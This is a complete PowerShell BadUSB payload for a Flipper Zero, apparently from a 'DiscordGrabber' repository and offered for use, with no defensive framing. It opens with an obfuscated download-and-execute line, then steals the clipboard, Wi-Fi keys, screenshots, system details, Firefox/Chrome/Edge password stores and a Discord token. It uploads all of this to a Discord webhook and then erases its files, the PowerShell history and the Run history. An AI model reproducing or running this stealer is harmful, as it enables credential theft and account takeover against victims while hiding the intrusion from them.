Flipper/BadUSB/s4dic - BadUSB/DiscordGrabber/payload à upload en ligne.ps1
2023-08-09 08:18:48 -07:00

248 lines
11 KiB
PowerShell

#Payload to execute in your flipperZero: this dowload, execute and clear history
#$n='i';set-alias v $n'wr';$b=[char]116;$c=[char]47;$a=$([char]104+$b+$b+[char]112+[char]58+$c+$c);IEX (v -usebasicparsing $a'raw.githubusercontent.com/s4dic/DiscordGrabber/main/bd.ps1?token=GHSAT0AAAAAABXCYHCCGGWFF43MHDED24HEYXT6JBQ'); PSReadLine; [Microsoft.PowerShell.PSConsoleReadLine]::ClearHistory(); exit
#Todo:
# Correct the Edge password error
#CHANGE URL TO YOUR URL
$url="https://discord.com/api/webhooks/XXXXXXXXXXXXXXXXXXXX/XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX" ;
#Get PC Name+Date+Time
$namepc = Get-Date -UFormat "$env:computername-$env:UserName-%m-%d-%Y_%H-%M-%S"
# Get PC ClipBoard
echo "" > "$env:temp\stats-$namepc.txt";
echo "####PC ClipBoard under this line:" >> "$env:temp\stats-$namepc.txt";
echo "####################################" >> "$env:temp\stats-$namepc.txt";
Get-Clipboard >> "$env:temp\stats-$namepc.txt";
echo "####################################" >> "$env:temp\stats-$namepc.txt";
echo "####End ClipBoard" >> "$env:temp\stats-$namepc.txt";
# Get WifiPassword
echo "" > "$env:temp\WIFI-$namepc.txt";
(netsh wlan show profiles) | Select-String "\:(.+)$" | %{$name=$_.Matches.Groups[1].Value.Trim(); $_} | %{(netsh wlan show profile name="$name" key=clear)} | out-file "$env:temp\WIFI-$namepc.txt";
# Screenshot
cd "$env:temp";
echo 'function Get-ScreenCapture' > "d.ps1";
echo '{' >> "d.ps1";
echo ' begin {' >> "d.ps1";
echo ' Add-Type -AssemblyName System.Drawing, System.Windows.Forms' >> "d.ps1";
echo ' Add-Type -AssemblyName System.Drawing' >> "d.ps1";
echo ' $jpegCodec = [Drawing.Imaging.ImageCodecInfo]::GetImageEncoders() |' >> "d.ps1";
echo ' Where-Object { $_.FormatDescription -eq "JPEG" }' >> "d.ps1";
echo ' }' >> "d.ps1";
echo ' process {' >> "d.ps1";
echo ' Start-Sleep -Milliseconds 44' >> "d.ps1";
echo ' [Windows.Forms.Sendkeys]::SendWait("{PrtSc}")' >> "d.ps1";
echo ' Start-Sleep -Milliseconds 550' >> "d.ps1";
echo ' $bitmap = [Windows.Forms.Clipboard]::GetImage()' >> "d.ps1";
echo ' $ep = New-Object Drawing.Imaging.EncoderParameters' >> "d.ps1";
echo ' $ep.Param[0] = New-Object Drawing.Imaging.EncoderParameter ([System.Drawing.Imaging.Encoder]::Quality, [long]100)' >> "d.ps1";
echo ' $screenCapturePathBase = $env:temp + "\" + $env:UserName + "_Capture"' >> "d.ps1";
echo ' $bitmap.Save("${screenCapturePathBase}.jpg", $jpegCodec, $ep)' >> "d.ps1";
echo ' }' >> "d.ps1";
echo '}' >> "d.ps1";
echo 'Get-ScreenCapture' >> "d.ps1";
sleep 1
$screencapture = echo $env:temp"\"$env:UserName"_Capture"
powershell -c $env:temp\d.ps1;
$Screencap = "$env:temp\d.ps1";
#New token Grab Method Aug 2022
taskkill /IM Discord.exe /F
taskkill /IM Discord.exe /F
gci $env:appdata\..\local\Discord\app-*\ | ? { $_.PSIsContainer } | sort CreationTime -desc | select -f 1 | cd;
.\Discord.exe --remote-debugging-port=9222
#Get Discord Folder (deprecated function)
# #Discord ZIP
# Add-Type -Assembly "System.IO.Compression.FileSystem" ;
# #Kill Discord
# taskkill /IM Discord.exe /F
# cd C:\Users\$env:UserName\AppData\Local\Discord\app-*\; .\Discord.exe --remote-debugging-port=9222;
#Define zip to copy
# $tokenfile = "$env:temp\Discord-Token-$namepc.zip"
# Get PC information
dir env: >> "$env:temp\stats-$namepc.txt";
# Get public IP
$pubip = (Invoke-WebRequest -UseBasicParsing -uri "http://ifconfig.me/").Content
echo "PUBLIC IP: $pubip" >> "$env:temp\stats-$namepc.txt";
# Get Local IP
ipconfig /all >> "$env:temp\stats-$namepc.txt";
# List all installed Software
echo "Installed Software:" >> "$env:temp\stats-$namepc.txt";
Get-ItemProperty HKLM:\Software\Microsoft\Windows\CurrentVersion\Uninstall\* | Select-Object DisplayName, DisplayVersion, Publisher, InstallDate | Format-Table -AutoSize >> "$env:temp\stats-$namepc.txt";
Get-ItemProperty HKCU:\Software\Microsoft\Windows\CurrentVersion\Uninstall\* | Select-Object DisplayName, DisplayVersion, Publisher, InstallDate | Format-Table -AutoSize >> "$env:temp\stats-$namepc.txt";
#Get FireFox Password
#firefox ZIP
Add-Type -Assembly "System.IO.Compression.FileSystem" ;
#Kill Firefox
taskkill /IM firefox.exe /F
#search key4.db and logins.json
$key4 = Get-Childitem -Path $env:appdata\Mozilla\Firefox\Profiles\ -Include key4.db -Recurse -ErrorAction SilentlyContinue | % { $_.fullname }
$logins = Get-Childitem -Path $env:appdata\Mozilla\Firefox\Profiles\ -Include logins.json -Recurse -ErrorAction SilentlyContinue | % { $_.fullname }
#Compress firefox files where stored passwords
$compress = @{
Path = "$key4", "$logins"
CompressionLevel = "Fastest"
DestinationPath = "$env:temp\Firefox-Password-$namepc.zip"
}
Compress-Archive @compress -Update
#Define zip to copy
$firefoxpassword = "$env:temp\Firefox-Password-$namepc.zip"
#Get Chrome Password
#Chrome ZIP
Add-Type -Assembly "System.IO.Compression.FileSystem";
#Kill Chrome
taskkill /IM chrome.exe /F
sleep 1
#Compress chrome files where stored passwords
$compress = @{
Path = "$env:appdata\..\local\Google\Chrome\User Data\Local State", "$env:appdata\..\local\Google\Chrome\User Data\default\Login Data", "$env:appdata\..\local\Google\Chrome\User Data\default\Preferences"
CompressionLevel = "Fastest"
DestinationPath = "$env:temp\Chrome-Password-$namepc.zip"
}
Compress-Archive @compress -Update
sleep 1
#Define zip to copy
$chromepassword = "$env:temp\Chrome-Password-$namepc.zip"
#Get Edge Password
#Edge ZIP
Add-Type -Assembly "System.IO.Compression.FileSystem" ;
#Kill Edge
taskkill /IM msedge.exe /F
sleep 1
#Compress Edge files where stored passwords
$compress = @{
Path = "$env:appdata\..\Local\Microsoft\Edge\User Data\Local State", "$env:appdata\..\Local\Microsoft\Edge\User Data\default\Login Data", "$env:appdata\..\Local\Microsoft\Edge\User Data\default\Preferences"
CompressionLevel = "Fastest"
DestinationPath = "$env:temp\Edge-Password-$namepc.zip"
}
Compress-Archive @compress -Update
sleep 1
#Define zip to copy
$edgepassword = "$env:temp\Edge-Password-$namepc.zip"
#Backup Edge folder to star with empty edge browser, to get Token with flipper
#Kill Edge Again
taskkill /IM msedge.exe /F
mv $env:APPDATA\..\Local\Microsoft\Edge $env:APPDATA\..\Local\Microsoft\ZZZZZZZ
#Sleep 60 to wait flipperzero action on discord token
sleep 60
#get discord token with Clipboard Method
Get-Clipboard >> "$env:temp\tk.txt";
$token =Get-content -tail 1 "$env:temp\tk.txt";
echo "" >> "$env:temp\stats-$namepc.txt";
echo "Discord Token" >> "$env:temp\stats-$namepc.txt";
echo "########" >> "$env:temp\stats-$namepc.txt";
echo $token >> "$env:temp\stats-$namepc.txt";
echo "########" >> "$env:temp\stats-$namepc.txt";
# Screenshot Token for Backup if clipboard Fail:
cd "$env:temp";
echo 'function Get-ScreenCapture' > "d.ps1";
echo '{' >> "d.ps1";
echo ' begin {' >> "d.ps1";
echo ' Add-Type -AssemblyName System.Drawing, System.Windows.Forms' >> "d.ps1";
echo ' Add-Type -AssemblyName System.Drawing' >> "d.ps1";
echo ' $jpegCodec = [Drawing.Imaging.ImageCodecInfo]::GetImageEncoders() |' >> "d.ps1";
echo ' Where-Object { $_.FormatDescription -eq "JPEG" }' >> "d.ps1";
echo ' }' >> "d.ps1";
echo ' process {' >> "d.ps1";
echo ' Start-Sleep -Milliseconds 44' >> "d.ps1";
echo ' [Windows.Forms.Sendkeys]::SendWait("{PrtSc}")' >> "d.ps1";
echo ' Start-Sleep -Milliseconds 550' >> "d.ps1";
echo ' $bitmap = [Windows.Forms.Clipboard]::GetImage()' >> "d.ps1";
echo ' $ep = New-Object Drawing.Imaging.EncoderParameters' >> "d.ps1";
echo ' $ep.Param[0] = New-Object Drawing.Imaging.EncoderParameter ([System.Drawing.Imaging.Encoder]::Quality, [long]100)' >> "d.ps1";
echo ' $screenCapturePathBase = $env:temp + "\" + $env:UserName + "Token_Capture"' >> "d.ps1";
echo ' $bitmap.Save("${screenCapturePathBase}.jpg", $jpegCodec, $ep)' >> "d.ps1";
echo ' }' >> "d.ps1";
echo '}' >> "d.ps1";
echo 'Get-ScreenCapture' >> "d.ps1";
$tokencapture = echo $env:temp"\"$env:UserName"Token_Capture"
powershell -c $env:temp\d.ps1;
$Screencap = "$env:temp\d.ps1";
#UPLOAD
cd $env:temp
# Send Name Computer to discord
$Body=@{ content = "**Stats from Flipper-Zero on user:** $env:UserName, on pc: $env:computername"};
Invoke-RestMethod -ContentType 'Application/Json' -Uri $url -Method Post -Body ($Body | ConvertTo-Json);
# Upload Stat
curl.exe -F "file1=@stats-$namepc.txt" $url;
# Upload wifi password
curl.exe -F "file2=@WIFI-$namepc.txt" $url;
# Upload Token Clipboard
$Body=@{ content = "**Discord Token:** ||$token||"};
Invoke-RestMethod -ContentType 'Application/Json' -Uri $url -Method Post -Body ($Body | ConvertTo-Json);
# Upload Token Screenshot Backup
$Body=@{ content = "**Token Capture Backup if clipBoard Fail:**"};
Invoke-RestMethod -ContentType 'Application/Json' -Uri $url -Method Post -Body ($Body | ConvertTo-Json);
curl.exe -F "file2=@$tokencapture.jpg" $url;
# Upload Discord Token (deprecated function)
# curl.exe -i -F file=@"$tokenfile" $url
# Upload Webbroser Password Pwned
$Body=@{ content = "**Web Browsers Password Pwned**"};
Invoke-RestMethod -ContentType 'Application/Json' -Uri $url -Method Post -Body ($Body | ConvertTo-Json);
# Upload firefox password
curl.exe -i -F file=@"$firefoxpassword" $url
# Upload chrome password
curl.exe -i -F file=@"$chromepassword" $url
# Upload Edge password
curl.exe -i -F file=@"$edgepassword" $url
# Upload screenshot
sleep 1
$Body=@{ content = "**Screen Capture before attack start**"};
Invoke-RestMethod -ContentType 'Application/Json' -Uri $url -Method Post -Body ($Body | ConvertTo-Json);
curl.exe -F "file2=@$screencapture.jpg" $url;
# Remove Edge clear configuration
# Kill again and agan Edge after flipper zero get the token
taskkill /IM msedge.exe /F
Remove-Item $env:APPDATA\..\Local\Microsoft\Edge -Force -Recurse;
sleep 2
Remove-Item $env:APPDATA\..\Local\Microsoft\Edge -Force -Recurse;
# Restore Edge configuration
mv $env:APPDATA\..\Local\Microsoft\ZZZZZZZ $env:APPDATA\..\Local\Microsoft\Edge
#Delete all file
# Delete ZIP Discord Token (deprecated function)
# Remove-Item "$tokenfile" -Force -Recurse;
# Delete stat
Remove-Item "stats-$namepc.txt" -Force -Recurse;
# Delete wifi password
Remove-Item "WIFI-$namepc.txt" -Force -Recurse;
# Delete screenshot
Remove-Item $screencapture* -Force -Recurse;
# Delete token screencapture
Remove-Item $tokencapture* -Force -Recurse;
# Delete token file
Remove-Item "$env:temp\tk.txt"; -Force -Recurse;
# Delete firefox password
Remove-Item $firefoxpassword -Force -Recurse;
# Delete Chrome password
Remove-Item $chromepassword -Force -Recurse;
# Delete Edge password
Remove-Item $edgepassword -Force -Recurse;
# Delete this script
Remove-Item $env:temp\p.ps1 -Force -Recurse;
# Delete screencapture script
Remove-Item $env:temp\d.ps1 -Force -Recurse;
#Last discord kill before quit
taskkill /IM Discord.exe /F
# Clear History powershell:
[Microsoft.PowerShell.PSConsoleReadLine]::ClearHistory();
# Clear run powershell:
Remove-Item HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\RunMRU
exit;